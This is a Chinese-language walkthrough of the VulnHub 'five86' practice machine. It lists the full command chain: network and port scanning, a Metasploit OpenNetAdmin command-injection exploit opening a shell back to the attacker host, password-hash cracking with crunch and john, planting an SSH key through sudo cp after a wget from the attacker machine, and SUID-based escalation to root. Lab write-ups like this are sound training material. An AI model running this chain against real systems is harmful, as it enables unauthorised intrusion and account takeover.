vulnhub之five86的實踐

今天實踐的是vulnhub的five86鏡像，下載地址，

https://download.vulnhub.com/five86/Five86-1.zip，

用workstation導入成功，先做地址掃描，

sudo netdiscover -r 192.168.137.0/24，

接著做端口掃描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.121，

直接訪問掃描出來的url，http://192.168.137.121/ona，

去metasploit搜索可利用的攻擊模塊，search OpenNetAdmin，

use exploit/unix/webapp/opennetadmin_ping_cmd_injection

set RHOSTS 192.168.137.121

set LHOST 192.168.137.141

exploit

拿到shell，不是root，需要提權，轉成可交互的shell，

python -c 'import pty; pty.spawn("/bin/bash")'，

查看到web目錄下有個douglas賬戶，密碼是哈希加密的，

給了提示，密碼是10個字符，包含aefhrt，

使用crunch生成一個字典，crunch 10 10 aefhrt > dict.txt，

把密碼的哈希值放到單獨的文件里，

echo '$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash，

用john進行破解，john --wordlist=./dict.txt hash，

得到密碼明文，fatherrrrr，用賬戶douglas/fatherrrrr進行ssh登錄，

sudo -l發現當前賬戶可以jen的權限執行cp命令，

用putty做個公私鑰對兒，把公鑰拷貝到kali攻擊機上，authorized_keys，

kali攻擊機上開啟http下載服務，python2 -m SimpleHTTPServer，

在靶機上，cd /tmp，

wget http://192.168.137.141:8000/authorized_keys，

chmod 777 authorized_keys，

sudo -u jen /bin/cp authorized_keys /home/jen/.ssh，

再用putty以jen的賬戶通過公鑰認證登錄，

收到一封郵件，查看內容，得到賬戶，moss/Fire!Fire!，

再次以新的賬戶ssh登錄，

查找以root權限執行的文件，find / -perm -u=s -type f 2>/dev/null，

看到有/home/moss/.games/upyourgame，

cd /home/moss/.games，./upyourgame，回答各種問題，得到新shell，

id確認一下是root，